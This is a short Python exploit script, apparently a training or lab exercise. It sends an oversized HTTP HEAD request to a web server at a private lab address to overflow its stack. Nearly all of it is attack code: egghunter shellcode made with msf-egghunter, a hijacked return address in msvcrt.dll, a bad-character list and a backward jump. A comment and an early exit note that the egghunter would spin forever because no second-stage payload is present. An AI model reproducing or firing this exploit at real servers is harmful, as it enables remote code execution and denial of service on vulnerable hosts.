#!/usr/bin/env python

import socket
import os
import sys

# Egghunter
# Size 32 bytes
# msf-egghunter -p windows -f python -e W00T
# DON'T RUN THE EXPLOIT BECAUSE THE EGG HUNTER WILL PERMANENTLY
# SPIKE THE CPU UP TO 100% WHILE IT LOOKS FOR THE NON EXISTENT EGG...
exit(1)
egg =  ""
egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
egg += "\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75"
egg += "\xea\xaf\x75\xe7\xff\xe7"

# ------------------------------------------------
# badchars: \x00\x0d\x0a\x3d\x20\x3f
# Stage1:
# (1) EIP: 0x77C35459 push esp # ret | msvcrt.dll
# (2) ESP: jump back 60 bytes in the buffer => \xEB\xC4
# ------------------------------------------------

eip = "\x59\x54\xc3\x77"
Stage1 = "A"*478 + egg + "A"*5 + eip + "\xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.88.131:8080\r\n"
"User-Agent: custom\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.88.131", 8080))
expl.send(buffer)
expl.close()
